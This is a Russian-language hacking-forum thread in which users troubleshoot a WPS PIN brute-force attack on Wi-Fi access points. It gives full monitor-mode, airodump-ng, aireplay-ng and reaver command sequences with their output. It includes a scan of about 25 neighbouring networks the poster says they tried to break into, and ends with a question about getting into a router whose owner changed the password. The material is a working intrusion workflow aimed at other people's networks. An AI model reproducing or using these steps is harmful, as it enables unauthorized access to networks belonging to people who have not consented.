Уязвимость в протоколе Wi-Fi Protected Setup

что говорит , airodump-ng скрин.
Какой адаптер , 3070 ни о чем не говорит.

 

А я вхожу в режим монитора без airmon'a, попробуй так...

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

 

В Kali -Rolling по таким командам ничего не происходит, извратили Backtrack донельзя.
И airmon-ng check kill нужен чтобы убить непонятные процессы, мрак.

 

В свое время у меня при переборе с флагом "А" и ассоциации с точкой в другом окне ривер пин пропустил. Так что команду: aireplay-ng -1 5 -a [MAC] wlan0
применяю только для проверки ассоциации с точкой.
Как вариант попробовать все проделать на WiFiSlax

 

вместо скрина, ответ на команду airodump-ng wlan1 ,выглядет так:
CH 5 ][ Elapsed: 42 s ][ 2016-08-14 19:08
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 -27 25 2 0 4 54e. WPA2 CCMP PSK abcNetwork

список разумеется побольше (штук 25 точек находится).

Сигнал сильный от тех точек которые пытался ломануть.

Адаптер брал на алиэкспрессе, если тут можно то могу потом ссылку дать, сам адаптер выглядет как альфа только с 2-мя антеннами.

 

Что это за палевый mac

 

давай весь список

 

Попробовал, но ничего не изменилось, вот последовательность моих действий:
1. iwconfig
2. ifconfig wlan0 down
3. ifconfig wlan1 down
4. iwconfig wlan1 mode monitor
5. ifconfig wlan1 up
6. airodump-ng wlan1
7. wash -i wlan1 -C
8. aireplay-ng -1 100 -a 00:11:22:33:44:55 -e abcNetwork wlan1
(предыдущая команда завершилась неудачно, но следующую в новом окне запускаю)
9. reaver -i wlan1 -b 00:11:22:33:44:55 -vv -c 6 -aAwSNE

после 8. aireplay-ng -1 100 -a 00:11:22:33:44:55 -e abcNetwork wlan1
получаю:
root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 wlan1
No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)
19:13:33 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
19:13:43 No such BSSID available.
Please specify an ESSID (-e).

(добавил название точки доступа)
root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 -e abcNetwork wlan1mon
No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)
17:58:03 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
17:58:13 No such BSSID available.

(взял другую точку доступа)
root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 -e abcNetwork wlan1mon
No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)
17:58:03 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
17:58:13 No such BSSID available.

(в другом окне запускаю)
root@kali:~# reaver -i wlan1 -b 00:11:22:33:44:55 -vv -c 6 -aAwSNE
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Switching wlan1 to channel 6
[+] Waiting for beacon from 00:11:22:33:44:55
[+] Associated with 00:11:22:33:44:55 (ESSID: abcNetwork)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
...
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred

 

список airodump-ng , же.

 

А зачем мне палить чей-то реальный MAC?

А смысл? (Если надо я конечно могу его запостить)

 

В общем говоря ты не взломаешь эту сеть - это виртуальный WiFi может даже на базе Connectify-me, о чем говорит mac 11,22,,,,,, , скажу честно , даже не проводились тесты по ловле хендшейка из программ. Вывод - Ты можешь забыть о такой точке если не словишь хендшейк. Reaver бесполезен. Лови другую, завтра протестирую на Connectify

P/S Никто не просил тебя палить mac , начало 3 элемента нам бы хватило, для определения как работает твой адаптер, ты так и не сказал - что это.

 

Triton_Mgn, я ответил по поводу адаптера тут https://forum.antichat.ru/threads/310835/page-175#post-3981441

вот список того что обнаружил мой адаптер:
root@kali:~# airodump-ng wlan1
CH 2 ][ Elapsed: 30 s ][ 2016-08-14 20:02
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C0:4A:00:00:00:00 -30 23 0 0 13 54e. WPA2 CCMP PSK <length: 0>
AC:F1F:00:00:00 -44 13 0 0 2 54e WPA2 CCMP PSK abc01
90:94:E4:00:00:00 -47 2 0 0 1 54e WPA2 CCMP PSK abc02
D8:EB:97:00:00:00 -50 15 0 0 6 54e WPA2 CCMP PSK abc03
F8:BF:09:00:00:00 -54 16 0 0 6 54e WPA2 CCMP PSK abc04
C0:4A:00:00:00:00 -52 14 0 0 6 54e. WPA2 CCMP PSK abc05
F8:1A:67:00:00:00 -59 14 3 1 11 54e. WPA2 CCMP PSK abc06
74:EA:3A:00:00:00 -58 6 5 0 13 54e. WPA2 CCMP PSK abc07
90:94:E4:00:00:00 -60 15 0 0 11 54e. WPA2 CCMP PSK abc08
90:EF:68:00:00:00 -61 25 0 0 9 54e WPA2 CCMP PSK <length: 0>
AC:F1F:00:00:00 -63 13 0 0 6 54e. WPA CCMP PSK abc09
C4:A8:1D:00:00:00 -62 3 0 0 4 54e. WPA2 CCMP PSK abc10
04:A1:51:00:00:00 -62 19 0 0 3 54e. WPA TKIP PSK abc11
C8:BE:19:00:00:00 -63 22 0 0 1 54e WPA2 CCMP PSK abc11
DC:9FB:00:00:00 -67 13 0 0 39 54e. WPA2 CCMP PSK <length: 0>
90:F6:52:00:00:00 -66 10 0 0 6 54e. WEP WEP abc12
64:70:02:00:00:00 -67 14 2 0 11 54e. WPA2 CCMP PSK abc13
DC:9FB:00:00:00 -67 15 0 0 38 54e. WPA2 CCMP PSK <length: 0>
146:4D:00:00:00 -72 19 0 0 13 54e. WPA2 CCMP PSK abc14
C4:6E:1F:00:00:00 -69 11 0 0 6 54e. WPA2 CCMP PSK abc15
6A:28:5D:00:00:00 -71 14 0 0 11 54e WPA2 CCMP PSK abc16
00:1C:F0:00:00:00 -71 4 0 0 6 54 . WPA2 CCMP PSK abc17
F0:7D:68:00:00:00 -73 18 0 0 1 54e. WPA2 CCMP PSK abc18
E0:3F:49:00:00:00 -72 6 0 0 4 54e WPA2 CCMP PSK abc19
1C:AF:F7:00:00:00 -71 9 0 0 11 54e. WPA2 CCMP PSK abc20
F8:BF:09:00:00:00 -72 2 0 0 7 54e WPA2 CCMP PSK abc21
EC:43:F6:00:00:00 -73 4 0 0 4 54e WPA2 CCMP PSK abc22
C8:BE:19:00:00:00 -74 4 0 0 11 54e WPA2 CCMP PSK abc23
C4:04:15:00:00:00 -75 13 0 0 11 54e WPA2 CCMP PSK abc24

MACи и названия точек чтобы не палить немного изменил

 

Я понял, что за адаптер в третий раз спрашиваю.

 

вроде так он называется на алиэкспрессе(прямо сейчас не посмотреть точно)
long rang BT-N9100 Beini USB Wifi Adapter Wireless Network Card Ralink 3070 High Power 3000mW Dual Antenna

 

Со всеми точками такая беда?

 

зайди лучше со своим адаптером в тему https://forum.antichat.ru/threads/57249/ Список адаптеров пригодных, вопросы решаться само собой. То , что твой адаптер на Ralinke 3070 -все фигня, а потом приходи сюда, мы поможем.

 

Это фейк/ альфа мощная 1000 mw/

 

Посчитай сам по закону Ома , USB -5 Вольт, 0.5 Ампер.

 

Спасибо, сейчас там спрошу, тем более что уже откопал ссылку на алиэкспрессе на мой девайс.

С теми которыми пробовал со всеми

 

Ребят, подскажите.
На точке Dir-320nru выключили WPS и сменили пароль (WPA2).
Можно ли взломать/подключиться зная пин код? (Windows 7, AirSlax).